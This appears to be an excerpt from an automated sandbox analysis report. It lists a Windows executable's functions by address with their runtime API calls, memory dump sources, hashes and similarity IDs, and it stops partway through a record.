                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountCriticalInitializeSectionSpin
                                                                                      • String ID: InitializeCriticalSectionEx
                                                                                      • API String ID: 2593887523-3084827643
                                                                                      • Opcode ID: 62c9c3c8061a36cb284b5b4f62325cb70b1f57a0b8f184452cc877646a3e357b
                                                                                      • Instruction ID: e3b4878b8b2622ba6bf40d9cc2696abe1639dde16f42eb7e65619179a5bf5680
                                                                                      • Opcode Fuzzy Hash: 62c9c3c8061a36cb284b5b4f62325cb70b1f57a0b8f184452cc877646a3e357b
                                                                                      • Instruction Fuzzy Hash: 95F0B471A45218BBCF016F51DC06DAEBFA1DB48711F50416AFC145A260DA768E60DBC9
                                                                                      Function 0042784C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Alloc
                                                                                      • String ID: FlsAlloc
                                                                                      • API String ID: 2773662609-671089009
                                                                                      • Opcode ID: fd9d65a171a056d1c884ae17c391572938ee0c5911db8705bd91af4f55eb7dc7
                                                                                      • Instruction ID: d984b48ed726c10e09e09521f762362c612908e14189fda8c429a7a57ccc9962
                                                                                      • Opcode Fuzzy Hash: fd9d65a171a056d1c884ae17c391572938ee0c5911db8705bd91af4f55eb7dc7
                                                                                      • Instruction Fuzzy Hash: 33E05C70B452287787047F24AC15A6EBB90CB48721F50017BFC0062250DE790E0086CD
                                                                                      Function 00421D9A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • try_get_function.LIBVCRUNTIME ref: 00421DAF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: try_get_function
                                                                                      • String ID: FlsAlloc
                                                                                      • API String ID: 2742660187-671089009
                                                                                      • Opcode ID: 94f4c328c14879ef9941ae38dd39c5ca87bb7bb5bb0a79ca14bc38f615110e5d
                                                                                      • Instruction ID: 7f6eb2c950241fcc20174b5a8362b69448faada22ee5f46ac9d08637f2af44bf
                                                                                      • Opcode Fuzzy Hash: 94f4c328c14879ef9941ae38dd39c5ca87bb7bb5bb0a79ca14bc38f615110e5d
                                                                                      • Instruction Fuzzy Hash: F9D05B35F8223867D51036D6BC02BEA7E588B04BB6F441167FF08652B2D59E445055DD
                                                                                      Function 0041CD5C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041CD6E
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID: 3Ro
                                                                                      • API String ID: 1269201914-1492261280
                                                                                      • Opcode ID: 5a744c418e586dadeb54618ec0d598bc565aaa8023e264ff61a76ffb57a2ab69
                                                                                      • Instruction ID: e5706584d86aa8f7c8fdf69f1430a856830932a1c7c312808eba37e66de08db6
                                                                                      • Opcode Fuzzy Hash: 5a744c418e586dadeb54618ec0d598bc565aaa8023e264ff61a76ffb57a2ab69
                                                                                      • Instruction Fuzzy Hash: F9B012F22D9101BD3124A2057E46E7B010CC5D4F94730906FF841D4140A88D4D83803F
                                                                                      Function 00428618 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 004281EB: GetOEMCP.KERNEL32(00000000,?,?,00428474,?), ref: 00428216
                                                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,004284B9,?,00000000), ref: 0042868C
                                                                                      • GetCPInfo.KERNEL32(00000000,004284B9,?,?,?,004284B9,?,00000000), ref: 0042869F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CodeInfoPageValid
                                                                                      • String ID:
                                                                                      • API String ID: 546120528-0
                                                                                      • Opcode ID: 521ab901f950d0ad3fe6016d97a73dc84600e0179c0298e482f5db38df764ef9
                                                                                      • Instruction ID: b593d52b643ea4c8af91f0efabc80aa044d7a574b7381ae310c12d2c6674fa9f
                                                                                      • Opcode Fuzzy Hash: 521ab901f950d0ad3fe6016d97a73dc84600e0179c0298e482f5db38df764ef9
                                                                                      • Instruction Fuzzy Hash: 3D515770B012258EDB208F35EC806BFBBE5EF91314FA4406FD4868B252DE3D9546CB99
                                                                                      Function 00411FA9 Relevance: 3.1, APIs: 2, Instructions: 115COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00412112
                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00412135
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw
                                                                                      • String ID:
                                                                                      • API String ID: 2005118841-0
                                                                                      • Opcode ID: 32f50b0cc4320dbc24f51e69371e2a6e0b8adfbe26712daf94315a6270467dc7
                                                                                      • Instruction ID: c58466310614fca9e19c29aeea194c597ac6d636f9f729dc037dc741f17c39bc
                                                                                      • Opcode Fuzzy Hash: 32f50b0cc4320dbc24f51e69371e2a6e0b8adfbe26712daf94315a6270467dc7
                                                                                      • Instruction Fuzzy Hash: 3241F6B46093826FD328DF34E58479AFBD4BB58308F00061FE75897242D7B99498C79E
                                                                                      Function 00401383 Relevance: 3.1, APIs: 2, Instructions: 96COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00401383
                                                                                        • Part of subcall function 00405FB1: __EH_prolog.LIBCMT ref: 00405FB6
                                                                                        • Part of subcall function 0040C413: __EH_prolog.LIBCMT ref: 0040C418
                                                                                        • Part of subcall function 0040C413: new.LIBCMT ref: 0040C45B
                                                                                        • Part of subcall function 0040C413: new.LIBCMT ref: 0040C47F
                                                                                      • new.LIBCMT ref: 004013FB
                                                                                        • Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 8d6764d0f256593f89a47f954b42ba740364bf9215fa9a53a0dc4a9a12e62ddd
                                                                                      • Instruction ID: 7d16d70ecb14e8e79e7b5dd1dd8a15287db09388ee78924138016be20b037bb4
                                                                                      • Opcode Fuzzy Hash: 8d6764d0f256593f89a47f954b42ba740364bf9215fa9a53a0dc4a9a12e62ddd
                                                                                      • Instruction Fuzzy Hash: 1C4145B0805B409ED720CF7A88859E7FBE5FB18304F404A2ED5EE97292CB366554CB19
                                                                                      Function 0040137E Relevance: 3.1, APIs: 2, Instructions: 94COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00401383
                                                                                        • Part of subcall function 00405FB1: __EH_prolog.LIBCMT ref: 00405FB6
                                                                                        • Part of subcall function 0040C413: __EH_prolog.LIBCMT ref: 0040C418
                                                                                        • Part of subcall function 0040C413: new.LIBCMT ref: 0040C45B
                                                                                        • Part of subcall function 0040C413: new.LIBCMT ref: 0040C47F
                                                                                      • new.LIBCMT ref: 004013FB
                                                                                        • Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: 82088425750a8f9786327660511d47626212b708da617ec15fd77a91959e708f
                                                                                      • Instruction ID: 967923b4f97704c4c437def08d8f66e870f0ef7ca6390e0d87ac0a602a2cf95d
                                                                                      • Opcode Fuzzy Hash: 82088425750a8f9786327660511d47626212b708da617ec15fd77a91959e708f
                                                                                      • Instruction Fuzzy Hash: BC4136B0805B409ED720DF7A88859E7FAE5FF18304F404A2ED5EE97282CB366554CB19
                                                                                      Function 00428457 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0042631F: GetLastError.KERNEL32(?,0043CBE8,00422674,0043CBE8,?,?,00422213,?,?,0043CBE8), ref: 00426323
                                                                                        • Part of subcall function 0042631F: _free.LIBCMT ref: 00426356
                                                                                        • Part of subcall function 0042631F: SetLastError.KERNEL32(00000000,?,0043CBE8), ref: 00426397
                                                                                        • Part of subcall function 0042631F: _abort.LIBCMT ref: 0042639D
                                                                                        • Part of subcall function 00428576: _abort.LIBCMT ref: 004285A8
                                                                                        • Part of subcall function 00428576: _free.LIBCMT ref: 004285DC
                                                                                        • Part of subcall function 004281EB: GetOEMCP.KERNEL32(00000000,?,?,00428474,?), ref: 00428216
                                                                                      • _free.LIBCMT ref: 004284CF
                                                                                      • _free.LIBCMT ref: 00428505
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorLast_abort
                                                                                      • String ID:
                                                                                      • API String ID: 2991157371-0
                                                                                      • Opcode ID: afc9614456cfdb25e5022f3842ae9cb1b6591ab00423bea9d9e7a77255d90ffe
                                                                                      • Instruction ID: 58e3e3796717311407861f67048789d47ee7981e6c8d01153a8da9ba05f48a85
                                                                                      • Opcode Fuzzy Hash: afc9614456cfdb25e5022f3842ae9cb1b6591ab00423bea9d9e7a77255d90ffe
                                                                                      • Instruction Fuzzy Hash: 6131E431A01229AFDB10EF69E440B6E77F4EF44324FA5419FE8049B291EF399D41CB18
                                                                                      Function 004094F1 Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00409B87,?,?,00407735), ref: 00409579
                                                                                      • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00409B87,?,?,00407735), ref: 004095AE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 0e36de1b61f0975f91e02c29b2129f7af44ae16e47bc85d055bd7b26c96cdd2f
                                                                                      • Instruction ID: 0beaafe9c38a62959d6171c6487471c4c240d38af4d97670f7e3b2be9b64cbd5
                                                                                      • Opcode Fuzzy Hash: 0e36de1b61f0975f91e02c29b2129f7af44ae16e47bc85d055bd7b26c96cdd2f
                                                                                      • Instruction Fuzzy Hash: AE21E6B2004748AFD7318F15CC45BA777E8EB49368F00493EF4D5A26D2C378AD498A65
                                                                                      Function 00409A12 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,00407436,?,?,?), ref: 00409A2C
                                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00409ADC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$BuffersFlushTime
                                                                                      • String ID:
                                                                                      • API String ID: 1392018926-0
                                                                                      • Opcode ID: 906d0a5fc383f78abd24a4b3cb5b37a5542226229cbed73a0d4e19191dc04917
                                                                                      • Instruction ID: 6cd6c925dbd7e52991087b31e057faa7a140176950c7cae40238e0bac7945fde
                                                                                      • Opcode Fuzzy Hash: 906d0a5fc383f78abd24a4b3cb5b37a5542226229cbed73a0d4e19191dc04917
                                                                                      • Instruction Fuzzy Hash: D021E431248281AFC714DE24D891AABBBD4AB96704F04493EB891972C2D73DED0CCB55
                                                                                      Function 00427735 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00427795
                                                                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004277A2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc__crt_fast_encode_pointer
                                                                                      • String ID:
                                                                                      • API String ID: 2279764990-0
                                                                                      • Opcode ID: d7a21d642bd9fba804c342f6586c16827edd9987b228dd58e17cddbd2b5c10e1
                                                                                      • Instruction ID: 41470a1e1533a0a35c43a41616af966ac3a9afd39fb21163fc90f9974bc324e7
                                                                                      • Opcode Fuzzy Hash: d7a21d642bd9fba804c342f6586c16827edd9987b228dd58e17cddbd2b5c10e1
                                                                                      • Instruction Fuzzy Hash: 6C11E337B042319B9F259E29FC8095B7395ABC4720B560232FD14AB354D639FC4286D9
                                                                                      Function 00409AEB Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00409B21
                                                                                      • GetLastError.KERNEL32 ref: 00409B2D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastPointer
                                                                                      • String ID:
                                                                                      • API String ID: 2976181284-0
                                                                                      • Opcode ID: da1cf5c853910478beb69786642fdbe2a060f9c28fd522ae53cb089a3b407638
                                                                                      • Instruction ID: ad73fbc3f5aebaea11dc1345a66e0156516d826c5cb688d8422fae7b206a2142
                                                                                      • Opcode Fuzzy Hash: da1cf5c853910478beb69786642fdbe2a060f9c28fd522ae53cb089a3b407638
                                                                                      • Instruction Fuzzy Hash: 120192717053046BDB349E29EC44767B7E9AB84328F14463FB152D36C1CB39FC088615
                                                                                      Function 00409897 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 004098EB
                                                                                      • GetLastError.KERNEL32 ref: 004098F8
                                                                                        • Part of subcall function 004096AA: __EH_prolog.LIBCMT ref: 004096AF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileH_prologLastPointer
                                                                                      • String ID:
                                                                                      • API String ID: 4236474358-0
                                                                                      • Opcode ID: a9ee84b3aa34bfa957d5062637af57de7004f3f45503c5de4ce8d99514abb9c1
                                                                                      • Instruction ID: 1ceee39926f18fb92de8af10517213a865aced3923d539b5a4e1767c3df1fcc5
                                                                                      • Opcode Fuzzy Hash: a9ee84b3aa34bfa957d5062637af57de7004f3f45503c5de4ce8d99514abb9c1
                                                                                      • Instruction Fuzzy Hash: 5A01F573221208ABCB18AE569C445AB3769AF82330718823FF925AB3D2C734DC118764
                                                                                      Function 00425AEA Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00425B0B
                                                                                        • Part of subcall function 004259FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,004223AA,?,0000015D,?,?,?,?,00422F29,000000FF,00000000,?,?), ref: 00425A2E
                                                                                      • HeapReAlloc.KERNEL32(00000000,?,00200000,?,?,0043CBE8,004017A1,?,?,?,?,00000000,?,00401378,?,?), ref: 00425B47
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocAllocate_free
                                                                                      • String ID:
                                                                                      • API String ID: 2447670028-0
                                                                                      • Opcode ID: ca04dd5068f28b3db96fc648586cc27dd5cf9ad74feb2f39b00117f1bace7fb0
                                                                                      • Instruction ID: b37030dfb1bee84ad8626f331cc13a275a38dd11491afc5299eb94669e2ec9f4
                                                                                      • Opcode Fuzzy Hash: ca04dd5068f28b3db96fc648586cc27dd5cf9ad74feb2f39b00117f1bace7fb0
                                                                                      • Instruction Fuzzy Hash: FFF0A431711A35A59B213A26BC01E6B3B589F81771B90411BF818962A1DE3CEC0181AD
                                                                                      Function 0040D142 Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadStringW.USER32(?,?,00000200,?), ref: 0040D187
                                                                                      • LoadStringW.USER32(?,?,00000200,?), ref: 0040D19D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString
                                                                                      • String ID:
                                                                                      • API String ID: 2948472770-0
                                                                                      • Opcode ID: f8d4cc0807b759bae040f4e628c3548543ccf32e1f9bea8170ea6682bd642638
                                                                                      • Instruction ID: f64494dd1f026860f9c26b77030d43449cdf87078d33d8449569a59e5d4e1e61
